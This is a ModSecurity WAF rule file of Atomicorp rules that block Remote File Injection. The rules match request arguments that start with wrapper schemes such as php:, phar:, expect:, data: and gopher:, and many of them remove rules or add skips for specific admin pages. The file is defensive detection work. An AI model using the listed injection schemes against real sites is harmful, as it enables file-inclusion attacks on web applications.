SecRule REQUEST_FILENAME "/wp-admin/options\.php" "phase:2,id:91165,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=380026"

SecRule REQUEST_FILENAME "/wp-admin/options-general\.php" "phase:2,id:91166,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340213,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/app-modernbill-admin/configs\.php" "phase:2,id:91167,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91168,t:none,pass,nolog,skipAfter:END_RULES_91168"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/|!ARGS:/^configParams/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340596,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/|!ARGS:/^configParams/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340597,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91168

SecRule REQUEST_FILENAME "/cgi-bin/formmail\.pl" "phase:2,id:91169,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/cgi-bin/formmail\.pl" "phase:2,id:91170,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91171,t:none,pass,nolog,skipAfter:END_RULES_91171"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Recommendations|!ARGS:Comments|!ARGS:background|!ARGS:redirect|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340598,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Recommendations|!ARGS:Comments|!ARGS:background|!ARGS:redirect|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340599,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91171

SecRule REQUEST_FILENAME "/mainsettings\.php" "phase:2,id:91172,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91173,t:none,pass,nolog,skipAfter:END_RULES_91173"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340600,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^settings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340601,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91173

SecRule REQUEST_FILENAME "/site\.php" "phase:2,id:91174,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91175,t:none,pass,nolog,skipAfter:END_RULES_91175"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:dict "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340602,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:dict "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340603,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91175

SecRule REQUEST_FILENAME "/admin/ciadmin\.php" "phase:2,id:91176,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91177,t:none,pass,nolog,skipAfter:END_RULES_91177"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:securebase1|!ARGS:base1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340604,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:securebase1|!ARGS:base1 "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340605,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91177

SecRule REQUEST_FILENAME "/category\.php" "phase:2,id:91178,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91179,t:none,pass,nolog,skipAfter:END_RULES_91179"

SecRule ARGS|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/page/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:desc|!ARGS:template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340607,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/page/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:desc|!ARGS:template "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340608,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91179

SecRule REQUEST_FILENAME "/modules/newbbex/post\.php" "phase:2,id:91180,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91181,t:none,pass,nolog,skipAfter:END_RULES_91181"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:hidden|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340609,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:hidden|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340610,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91181

SecRule REQUEST_FILENAME "/cgi-bin/mb/index2\.cgi" "phase:2,id:91182,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91183,t:none,pass,nolog,skipAfter:END_RULES_91183"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:index|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340611,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:index|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340612,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91183

SecRule REQUEST_FILENAME "/cerberus/parser\.php" "phase:2,id:91184,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91185,t:none,pass,nolog,skipAfter:END_RULES_91185"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:xml|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340613,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:xml|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340614,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91185

SecRule REQUEST_FILENAME "/imp/expand\.php" "phase:2,id:91186,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91187,t:none,pass,nolog,skipAfter:END_RULES_91187"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:field_value|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340615,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:field_value|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340616,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91187

SecRule REQUEST_FILENAME "/livehelp/mastersettings\.php" "phase:2,id:91188,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91189,t:none,pass,nolog,skipAfter:END_RULES_91189"

SecRule ARGS|!ARGS:server|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:newwebpath|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340617,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:server|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:newwebpath|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340618,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91189

SecRule REQUEST_FILENAME "/manager/edit_template\.php" "phase:2,id:91190,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91191,t:none,pass,nolog,skipAfter:END_RULES_91191"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:template|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340619,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:template|!ARGS:message|!ARGS:subject "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340620,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91191

SecRule REQUEST_FILENAME "/clip/index\.php" "phase:2,id:91192,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91193,t:none,pass,nolog,skipAfter:END_RULES_91193"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:route_to "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340621,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:route_to "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340622,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91193

SecRule REQUEST_FILENAME "/moduleinterface\.php" "phase:2,id:91194,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91195,t:none,pass,nolog,skipAfter:END_RULES_91195"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/template/|!ARGS:/^m1/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340623,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/template/|!ARGS:/^m1/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340624,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91195

SecRule REQUEST_FILENAME "/cpanel/savetype\.php" "phase:2,id:91196,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91197,t:none,pass,nolog,skipAfter:END_RULES_91197"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:embed "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340625,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:embed "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340626,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91197

SecRule REQUEST_FILENAME "/admin/basic_settings\.php" "phase:2,id:91198,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91199,t:none,pass,nolog,skipAfter:END_RULES_91199"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:custom_promo_code "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340627,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:custom_promo_code "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340628,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91199

SecRule REQUEST_FILENAME "/admin/site_setup\.php" "phase:2,id:91200,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91201,t:none,pass,nolog,skipAfter:END_RULES_91201"

